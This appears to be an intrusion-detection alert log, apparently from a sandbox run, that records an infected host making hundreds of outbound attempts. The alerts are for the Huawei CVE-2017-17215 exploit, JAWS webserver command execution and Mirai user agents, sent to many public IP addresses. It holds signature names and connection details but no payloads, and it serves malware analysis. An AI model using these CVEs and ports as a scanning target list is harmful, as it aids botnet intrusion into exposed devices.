                                                    2024-12-03T23:02:39.322548+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357678169.180.238.20280TCP
                                                    2024-12-03T23:02:39.650543+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348110156.179.192.6537215TCP
                                                    2024-12-03T23:02:39.650726+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352590156.205.225.4337215TCP
                                                    2024-12-03T23:02:39.650891+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234478641.50.79.1537215TCP
                                                    2024-12-03T23:02:39.650964+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359324156.88.157.15737215TCP
                                                    2024-12-03T23:02:39.651055+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235113241.219.54.3237215TCP
                                                    2024-12-03T23:02:39.651180+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360546197.213.196.9137215TCP
                                                    2024-12-03T23:02:39.651302+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235787641.161.165.437215TCP
                                                    2024-12-03T23:02:39.651503+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358998197.248.213.21637215TCP
                                                    2024-12-03T23:02:39.651723+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351886156.68.81.537215TCP
                                                    2024-12-03T23:02:39.651899+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234656841.113.142.12037215TCP
                                                    2024-12-03T23:02:39.652092+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235781841.49.128.18637215TCP
                                                    2024-12-03T23:02:39.652234+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234320441.91.76.1737215TCP
                                                    2024-12-03T23:02:39.660031+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235080841.44.118.16637215TCP
                                                    2024-12-03T23:02:39.660246+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338792156.101.76.24237215TCP
                                                    2024-12-03T23:02:39.660372+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353126156.74.238.13237215TCP
                                                    2024-12-03T23:02:39.666261+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341124156.30.229.14437215TCP
                                                    2024-12-03T23:02:39.666380+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233607641.64.56.9137215TCP
                                                    2024-12-03T23:02:39.666550+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352098156.180.77.8337215TCP
                                                    2024-12-03T23:02:39.666785+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359840156.70.150.19937215TCP
                                                    2024-12-03T23:02:39.666935+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235460641.149.22.7837215TCP
                                                    2024-12-03T23:02:39.667079+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345408197.27.136.12937215TCP
                                                    2024-12-03T23:02:39.667190+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234588041.145.56.19037215TCP
                                                    2024-12-03T23:02:39.667339+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354218197.54.19.3837215TCP
                                                    2024-12-03T23:02:39.667450+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344762156.29.235.10237215TCP
                                                    2024-12-03T23:02:39.667644+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235799041.20.161.22037215TCP
                                                    2024-12-03T23:02:39.667794+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351756156.189.155.6437215TCP
                                                    2024-12-03T23:02:39.667914+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348012156.171.109.6737215TCP
                                                    2024-12-03T23:02:39.675457+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337272156.26.109.17137215TCP
                                                    2024-12-03T23:02:39.675639+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235856441.69.248.23337215TCP
                                                    2024-12-03T23:02:39.691075+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355250156.125.208.5237215TCP
                                                    2024-12-03T23:02:39.691193+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357010156.155.106.16037215TCP
                                                    2024-12-03T23:02:39.706674+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234263641.203.148.11937215TCP
                                                    2024-12-03T23:02:39.706840+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234594641.140.235.17037215TCP
                                                    2024-12-03T23:02:39.707006+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356692197.225.104.8537215TCP
                                                    2024-12-03T23:02:39.784704+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359966156.69.232.13537215TCP
                                                    2024-12-03T23:02:39.800382+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356046156.147.229.18337215TCP
                                                    2024-12-03T23:02:39.831823+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233929441.92.134.25237215TCP
                                                    2024-12-03T23:02:39.838080+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337766197.167.65.25237215TCP
                                                    2024-12-03T23:02:39.869380+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235170441.208.145.23037215TCP
                                                    2024-12-03T23:02:39.869654+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339312156.80.53.10137215TCP
                                                    2024-12-03T23:02:39.878355+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235359641.83.186.25237215TCP
                                                    2024-12-03T23:02:39.909749+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355322156.155.15.23637215TCP
                                                    2024-12-03T23:02:39.909861+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233763841.175.147.4837215TCP
                                                    2024-12-03T23:02:39.910043+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354920197.241.42.11937215TCP
                                                    2024-12-03T23:02:39.916255+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352680175.207.149.20680TCP
                                                    2024-12-03T23:02:39.916255+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352680175.207.149.20680TCP
                                                    2024-12-03T23:02:39.925412+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356936197.251.221.23137215TCP
                                                    2024-12-03T23:02:39.963016+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350044156.162.95.3737215TCP
                                                    2024-12-03T23:02:39.988703+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337480156.12.184.9937215TCP
                                                    2024-12-03T23:02:40.003630+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.236048041.214.182.18837215TCP
                                                    2024-12-03T23:02:40.869201+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344164186.64.229.6580TCP
                                                    2024-12-03T23:02:40.869201+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344164186.64.229.6580TCP
                                                    2024-12-03T23:02:40.869492+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352436199.4.164.18480TCP
                                                    2024-12-03T23:02:40.869492+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352436199.4.164.18480TCP
                                                    2024-12-03T23:02:40.885189+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352668204.153.221.22280TCP
                                                    2024-12-03T23:02:40.885189+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352668204.153.221.22280TCP
                                                    2024-12-03T23:02:40.900611+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342066175.105.152.8680TCP
                                                    2024-12-03T23:02:40.900611+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342066175.105.152.8680TCP
                                                    2024-12-03T23:02:40.916304+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233879854.118.162.6780TCP
                                                    2024-12-03T23:02:40.916304+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233879854.118.162.6780TCP
                                                    2024-12-03T23:02:40.916393+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235759641.83.120.7837215TCP
                                                    2024-12-03T23:02:40.916499+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235190265.153.227.2780TCP
                                                    2024-12-03T23:02:40.916499+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235190265.153.227.2780TCP
                                                    2024-12-03T23:02:40.925727+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234771460.162.227.1580TCP
                                                    2024-12-03T23:02:40.925727+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234771460.162.227.1580TCP
                                                    2024-12-03T23:02:40.931784+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235259696.60.65.1580TCP
                                                    2024-12-03T23:02:40.931784+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235259696.60.65.1580TCP
                                                    2024-12-03T23:02:40.931924+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334266197.87.142.9037215TCP
                                                    2024-12-03T23:02:40.941187+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353416139.28.65.25280TCP
                                                    2024-12-03T23:02:40.941187+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353416139.28.65.25280TCP
                                                    2024-12-03T23:02:40.947384+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344546168.79.83.9480TCP
                                                    2024-12-03T23:02:40.947384+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344546168.79.83.9480TCP
                                                    2024-12-03T23:02:40.947492+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360760197.97.191.14237215TCP
                                                    2024-12-03T23:02:40.956644+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355292187.105.157.12580TCP
                                                    2024-12-03T23:02:40.956644+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355292187.105.157.12580TCP
                                                    2024-12-03T23:02:40.994960+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359824190.124.82.4180TCP
                                                    2024-12-03T23:02:40.994960+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359824190.124.82.4180TCP
                                                    2024-12-03T23:02:40.994974+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359264155.116.200.24380TCP
                                                    2024-12-03T23:02:40.994974+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359264155.116.200.24380TCP
                                                    2024-12-03T23:02:40.994998+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350888145.61.154.11980TCP
                                                    2024-12-03T23:02:40.994998+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350888145.61.154.11980TCP
                                                    2024-12-03T23:02:41.010311+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234991080.19.155.19080TCP
                                                    2024-12-03T23:02:41.010311+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234991080.19.155.19080TCP
                                                    2024-12-03T23:02:41.019260+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342154169.124.154.3280TCP
                                                    2024-12-03T23:02:41.019260+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342154169.124.154.3280TCP
                                                    2024-12-03T23:02:41.040804+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234324865.73.110.20980TCP
                                                    2024-12-03T23:02:41.040804+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234324865.73.110.20980TCP
                                                    2024-12-03T23:02:41.040827+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234799857.184.39.23980TCP
                                                    2024-12-03T23:02:41.040827+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234799857.184.39.23980TCP
                                                    2024-12-03T23:02:41.040843+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346558211.3.38.080TCP
                                                    2024-12-03T23:02:41.040843+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346558211.3.38.080TCP
                                                    2024-12-03T23:02:41.042939+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234514642.155.200.2080TCP
                                                    2024-12-03T23:02:41.042939+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234514642.155.200.2080TCP
                                                    2024-12-03T23:02:41.244457+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352190197.15.75.25337215TCP
                                                    2024-12-03T23:02:41.244650+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344702197.37.206.19337215TCP
                                                    2024-12-03T23:02:41.275655+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338428129.243.89.280TCP
                                                    2024-12-03T23:02:41.275655+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338428129.243.89.280TCP
                                                    2024-12-03T23:02:41.363308+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341348189.55.146.22080TCP
                                                    2024-12-03T23:02:41.363308+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341348189.55.146.22080TCP
                                                    2024-12-03T23:02:41.776137+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235319441.67.193.3237215TCP
                                                    2024-12-03T23:02:41.791871+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345772197.157.95.15037215TCP
                                                    2024-12-03T23:02:41.899992+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338134197.119.63.22637215TCP
                                                    2024-12-03T23:02:41.928493+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352152197.93.111.14337215TCP
                                                    2024-12-03T23:02:41.977598+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234245641.69.112.937215TCP
                                                    2024-12-03T23:02:41.977599+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359272197.163.141.6237215TCP
                                                    2024-12-03T23:02:41.977601+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233284241.80.146.1237215TCP
                                                    2024-12-03T23:02:41.977601+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357488197.55.237.637215TCP
                                                    2024-12-03T23:02:41.977608+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234322241.49.85.25137215TCP
                                                    2024-12-03T23:02:41.977608+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344394156.160.213.3537215TCP
                                                    2024-12-03T23:02:41.977608+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235645041.0.128.3737215TCP
                                                    2024-12-03T23:02:41.977608+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235426641.251.186.4937215TCP
                                                    2024-12-03T23:02:41.977608+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357744156.140.132.18937215TCP
                                                    2024-12-03T23:02:41.977609+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234637841.132.145.17037215TCP
                                                    2024-12-03T23:02:41.977609+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336182197.255.63.18137215TCP
                                                    2024-12-03T23:02:41.977612+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234309441.40.34.17837215TCP
                                                    2024-12-03T23:02:41.977613+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333232156.103.92.19937215TCP
                                                    2024-12-03T23:02:41.977613+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334190156.54.244.21037215TCP
                                                    2024-12-03T23:02:41.977613+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348784197.103.236.1837215TCP
                                                    2024-12-03T23:02:41.977613+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350182156.171.91.16237215TCP
                                                    2024-12-03T23:02:42.023903+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2354982197.223.117.15037215TCP
                                                    2024-12-03T23:02:42.023905+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343482156.107.62.19437215TCP
                                                    2024-12-03T23:02:42.023905+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337936197.116.55.10137215TCP
                                                    2024-12-03T23:02:42.023905+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341776156.121.246.5137215TCP
                                                    2024-12-03T23:02:42.023908+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235553841.147.231.637215TCP
                                                    2024-12-03T23:02:42.023914+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357652156.165.133.9737215TCP
                                                    2024-12-03T23:02:42.023914+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235384841.16.52.19337215TCP
                                                    2024-12-03T23:02:42.023992+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233556641.120.62.9237215TCP
                                                    2024-12-03T23:02:42.024012+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350508197.89.46.22837215TCP
                                                    2024-12-03T23:02:42.024027+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338820156.122.150.5537215TCP
                                                    2024-12-03T23:02:42.024045+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339548156.230.204.21837215TCP
                                                    2024-12-03T23:02:42.024063+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235143441.136.53.4437215TCP
                                                    2024-12-03T23:02:42.024082+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234353441.197.198.17237215TCP
                                                    2024-12-03T23:02:42.024100+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233291241.37.168.13837215TCP
                                                    2024-12-03T23:02:42.024121+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235952041.212.140.19937215TCP
                                                    2024-12-03T23:02:42.041416+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234319241.51.92.11037215TCP
                                                    2024-12-03T23:02:42.041470+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334854197.142.220.18337215TCP
                                                    2024-12-03T23:02:42.041681+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235869841.41.77.14237215TCP
                                                    2024-12-03T23:02:42.254041+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356910197.0.61.7337215TCP
                                                    2024-12-03T23:02:42.260310+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333410156.3.103.15137215TCP
                                                    2024-12-03T23:02:42.276012+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339430156.46.39.25537215TCP
                                                    2024-12-03T23:02:42.394409+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235110639.172.92.9880TCP
                                                    2024-12-03T23:02:42.394409+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235110639.172.92.9880TCP
                                                    2024-12-03T23:02:42.432100+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350440174.205.199.19580TCP
                                                    2024-12-03T23:02:42.432100+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350440174.205.199.19580TCP
                                                    2024-12-03T23:02:42.432244+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234781244.133.115.19380TCP
                                                    2024-12-03T23:02:42.432244+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234781244.133.115.19380TCP
                                                    2024-12-03T23:02:42.432314+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236098647.69.60.5680TCP
                                                    2024-12-03T23:02:42.432314+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236098647.69.60.5680TCP
                                                    2024-12-03T23:02:42.456933+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350248105.181.157.11880TCP
                                                    2024-12-03T23:02:42.456933+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350248105.181.157.11880TCP
                                                    2024-12-03T23:02:42.463402+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335546112.153.77.2980TCP
                                                    2024-12-03T23:02:42.463402+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335546112.153.77.2980TCP
                                                    2024-12-03T23:02:42.473423+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350222223.221.42.15080TCP
                                                    2024-12-03T23:02:42.473423+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350222223.221.42.15080TCP
                                                    2024-12-03T23:02:42.487652+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235905850.72.83.5580TCP
                                                    2024-12-03T23:02:42.487652+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235905850.72.83.5580TCP
                                                    2024-12-03T23:02:42.494593+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336820132.68.104.25480TCP
                                                    2024-12-03T23:02:42.494593+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336820132.68.104.25480TCP
                                                    2024-12-03T23:02:42.503616+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234799092.67.145.7580TCP
                                                    2024-12-03T23:02:42.503616+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234799092.67.145.7580TCP
                                                    2024-12-03T23:02:42.519267+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355890170.143.90.16580TCP
                                                    2024-12-03T23:02:42.519267+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355890170.143.90.16580TCP
                                                    2024-12-03T23:02:42.519501+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233450693.138.26.6980TCP
                                                    2024-12-03T23:02:42.519501+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233450693.138.26.6980TCP
                                                    2024-12-03T23:02:43.197503+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235512441.255.173.10337215TCP
                                                    2024-12-03T23:02:43.229002+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235555241.52.235.18737215TCP
                                                    2024-12-03T23:02:43.238318+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234954841.8.197.19737215TCP
                                                    2024-12-03T23:02:43.244460+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360838156.112.126.18637215TCP
                                                    2024-12-03T23:02:43.244536+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349420156.50.86.8037215TCP
                                                    2024-12-03T23:02:43.244633+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235285241.159.173.19537215TCP
                                                    2024-12-03T23:02:43.363146+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336662197.11.27.4637215TCP
                                                    2024-12-03T23:02:43.378796+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233521241.116.122.21937215TCP
                                                    2024-12-03T23:02:43.394354+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337402156.89.132.22837215TCP
                                                    2024-12-03T23:02:43.400705+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344150197.55.108.1637215TCP
                                                    2024-12-03T23:02:43.410071+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350370197.104.84.22037215TCP
                                                    2024-12-03T23:02:43.456992+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341450156.5.118.11737215TCP
                                                    2024-12-03T23:02:45.244681+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233418024.135.171.2280TCP
                                                    2024-12-03T23:02:45.244681+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233418024.135.171.2280TCP
                                                    2024-12-03T23:02:45.253897+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336014197.125.203.24337215TCP
                                                    2024-12-03T23:02:45.363662+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235314051.205.82.21380TCP
                                                    2024-12-03T23:02:45.363662+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235314051.205.82.21380TCP
                                                    2024-12-03T23:02:45.369197+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357668156.209.146.2537215TCP
                                                    2024-12-03T23:02:45.441271+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334138197.143.94.4237215TCP
                                                    2024-12-03T23:02:46.166588+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345734221.112.221.18580TCP
